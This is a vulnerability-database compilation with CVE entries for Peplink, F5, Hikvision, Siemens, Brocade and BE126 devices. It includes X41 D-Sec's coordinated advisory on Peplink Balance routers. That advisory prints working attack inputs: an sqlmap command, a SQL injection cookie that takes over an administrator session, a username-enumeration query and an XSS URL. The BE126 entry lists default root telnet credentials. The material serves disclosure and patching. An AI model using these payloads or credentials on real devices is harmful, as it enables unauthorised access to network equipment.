X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Registered office: Aachen, Aachen District Court: HRB19989
Managing Director: Markus Vervier
| VAR-201706-0987 | CVE-2017-8835 | SQL injection vulnerability in the firmware of multiple Peplink Balance devices |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
SQL injection exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. An attack vector is the bauth cookie to cgi-bin/MANGA/admin.cgi. One impact is enumeration of user accounts by observing whether a session ID can be retrieved from the sessions database. The firmware of multiple Peplink Balance devices contains an SQL injection vulnerability; information may be obtained or altered, and service operation may be disrupted (DoS). Peplink Balance 305 is a multi-WAN load-balancing router for medium-sized enterprises. A remote attacker can exploit this vulnerability to enumerate user accounts. The following products are affected: Peplink Balance 305, 380, 580, 710, 1350 and 2500.
| VAR-201706-0988 | CVE-2017-8836 | Cross-site request forgery vulnerability in the firmware of multiple Peplink Balance devices |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
CSRF exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The CGI scripts in the administrative interface are affected. This allows an attacker to execute commands if a logged-in user visits a malicious website, for example to change the credentials of the administrative web interface. The firmware of multiple Peplink Balance devices contains a cross-site request forgery vulnerability; information may be obtained or altered, and service operation may be disrupted (DoS). Peplink Balance 305 is a multi-WAN load-balancing router for medium-sized enterprises. A cross-site request forgery vulnerability exists in several Peplink Balance products running firmware versions before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093; it stems from the CGI scripts of the management interface not being protected against cross-site request forgery attacks. The following products are affected: Peplink Balance 305, 380, 580, 710, 1350 and 2500.
| VAR-201706-0989 | CVE-2017-8837 | Certificate and password management vulnerability in the firmware of multiple Peplink Balance devices |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
Cleartext password storage exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The files in question are /etc/waipass and /etc/roapass. In case one of these devices is compromised, the attacker can gain access to passwords and abuse them to compromise further systems. The firmware of multiple Peplink Balance devices contains a vulnerability related to certificate and password management; information may be obtained or altered, and service operation may be disrupted (DoS). Peplink Balance 305 is a multi-WAN load-balancing router for medium-sized enterprises. A cleartext password storage vulnerability exists in Peplink Balance products running firmware versions before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093; it stems from passwords being stored in cleartext in the files /etc/waipass and /etc/roapass. The following products are affected: Peplink Balance 305, 380, 580, 710, 1350 and 2500.
X41 D-Sec GmbH Security Advisory: X41-2017-005
Multiple Vulnerabilities in peplink balance routers
===================================================
Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to access the
administrative web interface with admin credentials, delete files,
perform CSRF and XSS attacks.
Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.
SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter which is set e.g. when accessing
https://ip/cgi-bin/MANGA/admin.cgi.
The injection can be checked with the following command:
./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
--flush-session -t trace.log --prefix "'" --suffix "--" -a
The vulnerability in the Peplink device allows to access the SQLite
session database containing user and session variables. By using the the
following cookie in a web request, it is possible to select a running
administrator session to be used for the attackers login.
bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2
By forming specialised SQL queries, it is possible to retrieve usernames
from the database. This worked by returning a valid session in case the
username existed and no session if it did not exist. In the first case
the server did not set a new session cookie in the response to the request.
SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')
Workarounds
-----------
Install vendor supplied update.
No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected
against cross site request forgery attacks. This allows an attacker to
execute commands, if a logged in user visits a malicious website. This
can for example be used to change the credentials of the administrative
webinterface.
Workarounds
-----------
Install vendor supplied update.
Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass.
Workarounds
-----------
Install vendor supplied update.
XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site-scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E
This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the the
orig_url parameter to trigger a cross-site-scripting issue in
/guest/preview.cgi. The injection is directly into existing JavaScript.
This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Summary and Impact
------------------
A logged in user can delete arbitrary files on the Peplink devices, by
abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path
is provided to the upfile.path parameter the file provided in the path
is deleted during the process. This can be abused to cause a denial of
service (DoS). In combination with the missing CSRF protection, this can
be abused remotely via a logged in user.
Workarounds
-----------
Install vendor supplied update.
Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
If the webinterface is accessible, it is possible to retrieve sensitive
information without a valid login by opening
cgi-bin/HASync/hasync.cgi?debug=1
This displays the following:
-----8<------------------------------------------------
Master LAN Address = [ <internal ip> / <netmask> ]
Serial Number = [ <serial number> ]
HA Group ID = [ <group id> ]
Virtual IP = [ <internal ip> / <netmask> ]
Submitted syncid = [ <syncid> ]
-----8<------------------------------------------------
This information can be valuable for an attacker to exploit other issues.
Workarounds
-----------
Install vendor supplied update.
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-04-07 Issue found
2017-04-10 Vendor asked for security contact
2017-04-11 Vendor replied, send GPG key
2017-04-11 Information supplied to vendor
2017-04-11 Vendor acknowledges that the information is received
2017-04-17 Vendor acknowledges SQL injection
2017-05-08 CVE IDs for all issues requested
2017-05-08 CVE IDs assigned
2017-05-11 Vendor informed about CVE IDs
2017-05-29 Version provided to X41 for testing
2017-05-31 First test results sent back to the vendor
2017-06-01 Remaining test results sent back to the vendor
2017-06-05 Coordinated Firmware and Advisory release
--
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Registered office: Aachen, Amtsgericht Aachen (district court): HRB19989
Managing director (Geschäftsführer): Markus Vervier
| VAR-201705-3521 | CVE-2016-9251 | Multiple F5 BIG-IP products: vulnerability related to authorization, permissions, and access control |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
In F5 BIG-IP 12.0.0 through 12.1.2, an authenticated attacker may be able to cause an escalation of privileges through a crafted iControl REST connection. Multiple F5 BIG-IP products contain vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). F5 BIG-IP is a load balancer that uses a variety of allocation algorithms to distribute network requests to available servers in a server cluster; by managing incoming web traffic and increasing effective network bandwidth, the hardware device gives network visitors the best possible networking experience. F5 BIG-IP iControl REST has a remote privilege elevation vulnerability that allows remote authenticated users to issue a specially crafted iControl REST connection to gain elevated privileges on the target system. F5 BIG-IP LTM and the other products listed below are products of F5 in the United States. LTM is a local traffic manager; APM is a solution that provides secure unified access to business-critical applications and networks. Security flaws exist in several F5 products. The following products and versions are affected: F5 BIG-IP LTM version 12.0.0 to 12.1.2; BIG-IP AAM version 12.0.0 to 12.1.2; BIG-IP AFM version 12.0.0 to 12.1.2; BIG-IP Analytics version 12.0.0 through 12.1.2; BIG-IP APM version 12.0.0 through 12.1.2; BIG-IP ASM version 12.0.0 through 12.1.2; BIG-IP DNS version 12.0.0 to version 12.1.2; BIG-IP Link Controller version 12.0.0 to version 12.1.2; BIG-IP PEM version 12.0.0 to version 12.1.2; BIG-IP WebSafe version 12.0.0 to version 12.1.2
| VAR-201705-3517 | CVE-2016-9253 | Multiple F5 BIG-IP products: input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
In F5 BIG-IP 12.1.0 through 12.1.2, specific websocket traffic patterns may cause a disruption of service for virtual servers configured to use the websocket profile. Multiple F5 BIG-IP products contain an input validation vulnerability. Service operation may be disrupted (DoS). F5 BIG-IP is a load balancer that uses a variety of allocation algorithms to distribute network requests to available servers in a server cluster; by managing incoming web traffic and increasing effective network bandwidth, the hardware device gives network visitors the best possible networking experience. F5 BIG-IP has a remote denial of service vulnerability: remote users can send specially crafted websocket traffic to services on the target system, causing the target system to deny service. F5 BIG-IP LTM and the other products listed below are products of F5 in the United States. LTM is a local traffic manager; APM is a solution that provides secure unified access to business-critical applications and networks. Security flaws exist in several F5 products. Attackers can exploit this vulnerability to compromise virtual server services. The following products and versions are affected: F5 BIG-IP LTM version 12.1.0 to 12.1.2; BIG-IP AAM version 12.1.0 to 12.1.2; BIG-IP AFM version 12.1.0 to 12.1.2; BIG-IP Analytics version 12.1.0 through 12.1.2; BIG-IP APM version 12.1.0 through 12.1.2; BIG-IP ASM version 12.1.0 through 12.1.2; BIG-IP DNS version 12.1.0 to version 12.1.2; BIG-IP Link Controller version 12.1.0 to version 12.1.2; BIG-IP PEM version 12.1.0 to version 12.1.2; BIG-IP WebSafe version 12.1.0 to version 12.1.2
| VAR-201705-4194 | No CVE | Hikvision s2-045 Remote Command Execution Vulnerability in Multiple Product Systems |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Hikvision is a video-centric IoT solution and data operation service provider.
Multiple Hikvision product systems use Apache Struts xwork as the web application framework. The file upload function of the Jakarta plugin has a remote command execution vulnerability, S2-045. Attackers can modify the Content-Type value in the HTTP request header when uploading files to trigger the vulnerability, and then execute system commands to obtain server permissions.
| VAR-201705-4157 | No CVE | LAquis SCADA DLL Hijacking Vulnerability |
CVSS V2: 6.2 CVSS V3: - Severity: MEDIUM |
LAquis SCADA is a tool and language for data collection, process monitoring, industrial automation, storage, and report generation for quality management and application development.
LAquis SCADA has a DLL hijacking vulnerability. The vulnerability is caused by the LAquis SCADA application failing to specify an absolute path for a DLL it loads, which allows an attacker to build a malicious DLL, place it in a specific path, and cause the application to load and execute it.
| VAR-201705-3221 | CVE-2017-2681 | Siemens SIMATIC HMI Denial of service vulnerability |
CVSS V2: 6.1 CVSS V3: 6.5 Severity: MEDIUM |
Specially crafted PROFINET DCP packets sent on a local Ethernet segment (Layer 2) to an affected product could cause a denial of service condition of that product. Human interaction is required to recover the system. PROFIBUS interfaces are not affected. SIMATIC HMI is an industrial device from Siemens AG, Germany. The SIMATIC HMI panels are used for operator control and monitoring of machines and equipment. Multiple Siemens products are prone to multiple denial-of-service vulnerabilities.
Attackers can exploit these issues to cause a denial-of-service condition. Manual restart of the server is required to resume normal operation. A vulnerability has been identified in SIMATIC CP 343-1 Std (All versions), SIMATIC CP 343-1 Lean (All versions), SIMATIC CP 343-1 Adv (All versions), SIMATIC CP 443-1 Std (All versions < V3.2.17), SIMATIC CP 443-1 Adv (All versions < V3.2.17), SIMATIC CP 443-1 OPC-UA (All versions), SIMATIC CP 1243-1 (All versions < V2.1.82), SIMATIC CP 1243-1 IRC (All versions < V2.1.82), SIMATIC CP 1243-1 IEC (All versions), SIMATIC CP 1243-1 DNP3 (All versions), SIMATIC CM 1542-1 (All versions < V2.0), SIMATIC CM 1542SP-1 (All versions < V1.0.15), SIMATIC CP 1542SP-1 IRC (All versions < V1.0.15), SIMATIC CP 1543SP-1 (All versions < V1.0.15), SIMATIC CP 1543-1 (All versions < V2.1), SIMATIC RF650R (All versions < V3.0), SIMATIC RF680R (All versions < V3.0), SIMATIC RF685R (All versions < V3.0), SIMATIC CP 1616 (All versions < V2.7), SIMATIC CP 1604 (All versions < V2.7), SIMATIC DK-16xx PN IO (All versions < V2.7), SCALANCE X-200 (All versions < V5.2.2), SCALANCE X-200 IRT (All versions), SCALANCE X-300/X408 (All versions < V4.1.0), SCALANCE X414 (All versions < V3.10.2), SCALANCE XM400 (All versions < V6.1), SCALANCE XR500 (All versions < V6.1), SCALANCE W700 (All versions < V6.1), SCALANCE M-800, S615 (All versions < V4.03), Softnet PROFINET IO for PC-based Windows systems (All versions < V14 SP1), IE/PB-Link (All versions < V3.0), IE/AS-i Link PN IO (All versions), SIMATIC Teleservice Adapter Standard Modem, IE Basic, IE Advanced (All versions), SITOP PSU8600 PROFINET (All versions < V1.2.0), SITOP UPS1600 PROFINET (All versions < V2.2.0), SIMATIC ET 200AL (All versions < V1.0.2), SIMATIC ET 200ecoPN (All versions), SIMATIC ET 200M (All versions), SIMATIC ET 200MP IM155-5 PN BA (All versions < V4.0.1), SIMATIC ET 200MP IM155-5 PN ST (All versions < V4.1), SIMATIC ET 200MP (except IM155-5 PN BA and IM155-5 PN ST) (All versions), 
SIMATIC ET 200pro (All versions), SIMATIC ET 200S (All versions), SIMATIC ET 200SP IM155-6 PN ST (All versions < V4.1.0), SIMATIC ET 200SP (except IM155-6 PN ST) (All versions), SIMATIC PN/PN Coupler (All versions < V4.0), Development/Evaluation Kit DK Standard Ethernet Controller (All versions < V4.1.1 Patch04), Development/Evaluation Kit EK-ERTEC 200P (All versions < V4.4.0 Patch01), Development/Evaluation Kit EK-ERTEC 200 (All versions < V4.2.1 Patch03), SIMATIC S7-200 SMART (All versions < V2.3), SIMATIC S7-300 incl. F and T (All versions < V3.X.14), SIMATIC S7-400 PN/DP V6 Incl. F (All versions < V6.0.6), SIMATIC S7-400-H V6 (All versions < V6.0.7), SIMATIC S7-400 PN/DP V7 Incl. F (All versions < V7.0.2), SIMATIC S7-410 (All versions < V8.2), SIMATIC S7-1200 incl. F (All versions < V4.2.1), SIMATIC S7-1500 incl. F, T, and TF (All versions < V2.1), SIMATIC S7-1500 Software Controller incl. F (All versions < V2.1), SIMATIC WinAC RTX 2010 incl. F (All versions), SIRIUS ACT 3SU1 interface module PROFINET (All versions), SIRIUS Soft Starter 3RW44 PN (All versions), SIRIUS Motor Starter M200D PROFINET (All versions), SIMOCODE pro V PROFINET (All versions < V2.0.0), SINAMICS DCM w. PN (All versions < V1.4 SP1 HF5), SINAMICS DCP w. PN (All versions < V1.2 HF 1), SINAMICS G110M w. PN (All versions < V4.7 SP6 HF3), SINAMICS G120(C/P/D) w. PN (All versions < V4.7 SP6 HF3), SINAMICS G130 V4.7 w. PN (All versions < V4.7 HF27), SINAMICS G150 V4.7 w. PN (V4.7: All versions < V4.7 HF27), SINAMICS G130 V4.8 w. PN (All versions < V4.8 HF4), SINAMICS G150 V4.8 w. PN (All versions < V4.8 HF4), SINAMICS S110 w. PN (All versions < V4.4 SP3 HF5), SINAMICS S120 V4.7 w. PN (All versions < V4.7 HF27), and others. This vulnerability affects only SIMATIC HMI Multi Panels and HMI Mobile Panels, and S7-300/S7-400 devices. Siemens SIMATIC S7-300 F, etc. Siemens SIMATIC S7-300 F is a process controller. SIMATIC HMI Comfort Panels are touch screens
| VAR-201705-3220 | CVE-2017-2680 | Multiple Siemens products: denial of service (DoS) vulnerability |
CVSS V2: 6.1 CVSS V3: 6.5 Severity: MEDIUM |
Specially crafted PROFINET DCP broadcast packets could cause a denial of service condition of affected products on a local Ethernet segment (Layer 2). Human interaction is required to recover the systems. PROFIBUS interfaces are not affected. SIMATIC CP, SIMATIC RF600, SCALANCE W700, etc. are all industrial automation products from Siemens AG. A denial of service vulnerability exists in several industrial devices from Siemens. Multiple Siemens products are prone to multiple denial-of-service vulnerabilities.
Attackers can exploit these issues to cause a denial-of-service condition. Manual restart of the server is required to resume normal operation. SIEMENS SIMATIC CP 343-1 Std, CP 343-1 Lean (All versions), SIMATIC CP 343-1 Adv (All versions), SIMATIC CP 443-1 Std, CP 443-1 Adv (All versions before V3.2.17), SIMATIC CP 443-1 OPC-UA (All versions), SIMATIC CP 1243-1 (All versions before V2.1.82), SIMATIC CP 1243-1 IRC (All versions before V2.1.82), SIMATIC CP 1243-1 IEC (All versions), SIMATIC CP 1243-1 DNP3 (All versions), SIMATIC CM 1542-1 (All versions before V2.0), SIMATIC CP 1542SP-1, CP 1542SP-1 IRC, and CP 1543SP-1 (All versions before to V1.0.15), SIMATIC CP 1543-1 (All versions before V2.1), SIMATIC RF650R, RF680R, RF685R (All versions before V3.0), SIMATIC CP 1616, CP 1604, DK-16xx PN IO (All versions before V2.7), SCALANCE X-200 (All versions before V5.2.2), SCALANCE X200 IRT (All versions before V5.4.0), SCALANCE X-300/X408 (All versions before V4.1.0), SCALANCE X414 (All versions before V3.10.2), SCALANCE XM400, XR500 (All versions before V6.1), SCALANCE W700 (All versions before V6.1), SCALANCE M-800, S615 (All versions before V04.03), Softnet PROFINET IO for PC-based Windows systems (All versions before V14 SP1), IE/PB-Link (All versions before V3.0), IE/AS-i Link PN IO (All versions), SIMATIC Teleservice Adapter Standard Modem, IE Basic, IE Advanced (All versions), SITOP PSU8600 PROFINET (All versions before V1.2.0), SITOP UPS1600 PROFINET (All versions before V2.2.0), SIMATIC ET 200AL (All versions before V1.0.2), SIMATIC ET 200ecoPN (All versions), SIMATIC ET 200M (All versions), SIMATIC ET 200MP (All versions before V4.0.1), SIMATIC ET 200pro (All versions), SIMATIC ET 200S (All versions), SIMATIC ET 200SP (All versions before V4.1.0), SIMATIC PN/PN Coupler (All versions before V4.0), DK Standard Ethernet Controller (All versions before V4.1.1 Patch04), EK-ERTEC 200P PN IO (All versions before V4.4.0 Patch01), EK-ERTEC 200 PN IO (All versions before 
V4.2.1 Patch03), SIMATIC S7-200 SMART (All versions before V2.3), SIMATIC S7-300 incl. F and T (All versions before V3.X.14), SIMATIC S7-400 PN/DP V6 Incl. F (All versions before V6.0.6), SIMATIC S7-400-H V6 (All versions before V6.0.7), SIMATIC S7-400 PN/DP V7 incl. F (All versions), SIMATIC S7-CPU 410 (All versions before V8.2), SIMATIC S7-1200 incl. F (All versions before V4.2.1), SIMATIC S7-1500 incl. F, T, and TF (All versions before V2.1), SIMATIC S7-1500 Software Controller incl. F (All versions before V2.1), SIMATIC WinAC RTX 2010 incl. F (All versions), SIRIUS ACT 3SU1 interface module PROFINET (All versions), SIRIUS Soft starter 3RW44 PN (All versions), SIRIUS Motor starter M200D PROFINET (All versions), SIMOCODE pro V PROFINET (All versions), SINAMICS DCM (All versions before V1.4 SP1 HF5), SINAMICS DCP (All versions), SINAMICS G110M / G120(C/P/D) w. PN (All versions before V4.7 SP6 HF3), SINAMICS G130 and G150 (All versions before V4.7 HF27 and V4.8 before HF4), SINAMICS S110 w. PN (All versions before V4.4 SP1 HF5), SINAMICS S120 (All versions before V4.7 HF27 and V4.8 before HF4), SINAMICS S150 (All versions before V4.7 HF27 and V4.8 before HF4), SINAMICS V90 w. PN (All versions before V1.1), SIMOTION (All versions before V4.5 HF1), SINUMERIK 828D (All versions before V4.5 SP6 HF2 and V4.7 before SP6 HF8), SINUMERIK 840D sl (All versions before V4.5 SP6 HF8 and V4.7 before SP4 HF1), SIMATIC HMI Comfort Panels, HMI Multi Panels, HMI Mobile Panels (All versions) could be affected by a Denial-of-Service condition induced by a specially crafted PROFINET DCP broadcast (Layer 2 - Ethernet) packet. Siemens SIMATIC S7-200 Smart, etc. Siemens SIMATIC S7-200 Smart is a programmable logic controller (PLC) used in small and medium-sized automation systems. Siemens SIMATIC CP 343-1 Advanced is an Ethernet communication module used to support PROFINET (a new generation of automation bus standard based on industrial Ethernet technology). 
SIRIUS Motor starter M200D PROFINET is a motor starter. The following products and versions are affected: Siemens Extension Unit 12" PROFINET prior to V01.01.01; Extension Unit 15" PROFINET prior to V01.01.01; Extension Unit 19" PROFINET prior to V01.01.01; Extension Unit 22" PROFINET; SIMATIC CP 1242-7 GPRS V2 prior to V2.1.82; SIMATIC CP 1243-7 LTE/US prior to V2.1.82; SIMATIC CP 1243-8 prior to V2.1.82; SIMATIC CP 1626 prior to V1.1
| VAR-201705-1684 | CVE-2016-8209 | Brocade NetIron management module denial of service (DoS) vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Improper checks for unusual or exceptional conditions in Brocade NetIron 05.8.00 and later releases up to and including 06.1.00, when the Management Module is continuously scanned on port 22, may allow attackers to cause a denial of service (crash and reload) of the management module. Brocade NetIron OS is an operating system developed by Brocade Communications Systems (Brocade) in the United States that runs on switches and routers. A security vulnerability exists in Brocade NetIron versions 05.8.00 to 06.1.00. The vulnerability is caused by the program not properly detecting abnormal conditions.
| VAR-201709-1194 | CVE-2017-8770 | BE126 WIFI Repeater devices: information disclosure vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
There is LFD (local file disclosure) on BE126 WIFI repeater 1.0 devices that allows attackers to read the entire filesystem on the device via a crafted getpage parameter. The Gongjin Electronics BE126 WIFI repeater is a wireless Internet repeater from China's Gongjin Electronics. A security hole exists in version 1.0 of the Gongjin Electronics BE126 WIFI repeater.
| VAR-201709-1196 | CVE-2017-8772 | BE126 WIFI Repeater devices: use of hard-coded credentials vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
On BE126 WIFI repeater 1.0 devices, an attacker can log into telnet (which is open by default) with default credentials as root (username:"root" password:"root") and can: 1. Read the entire file system; 2. Write to the file system; or 3. Execute any code that attacker desires (malicious or not). BE126 WIFI Repeater devices contain a vulnerability related to the use of hard-coded credentials. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The Gongjin Electronics BE126 WIFI repeater is a wireless Internet repeater from China's Gongjin Electronics. A security hole exists in version 1.0 of the Gongjin Electronics BE126 WIFI repeater.